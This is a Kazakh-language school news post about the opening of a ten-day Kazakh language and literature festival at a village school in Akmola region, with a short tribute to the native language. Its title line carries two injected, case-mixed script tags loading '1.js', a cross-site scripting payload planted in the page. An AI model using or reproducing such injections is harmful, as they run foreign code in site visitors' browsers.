«Тіл – өлшеусіз қазына, өрісі кең әлем» атты қазақ тілі мен әдебиеті онкүндігінің ашылуы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.02.2022

Ақмола облысы Целиноград ауданы Талапкер ауылы жалпы орта білім беретін мектебінде қазақ тілі онкүндігінің ашылу салтанатты жиыны өтті. Әдістеме бірлестік жетекшісі – Кайкенова Асемгуль Амангелдіқызы апталықтың жоспарымен таныстырып өтті.

Тілдің иесі – кешегі қазақ, бүгінгі қазақ және болашақтағы қазақ. Тілдің ғұмыры уақыт тәрізді мәңгілік. Тіл – халықтың мәңгілік халық болып қалуының айғағы. Тіл - өткеннің ұрпаққа қалдырған аманаты, бүгінгі күннің абыройы, ертеңгі күннің кепілі. Сондықтан да өз ана тіліміздің қадірін біліп, өз тілімізде дұрыс сөйлесе білу қазақ баласының бірден-бір міндеті болып табылады. Онкүндіктің ашылуында мектебіміздің оқушылары өлеңдерді мәнерлеп оқып, күй шертті.

 

Просмотров: 725


Пікір қосу



Деректерді қолтаңбаға қосу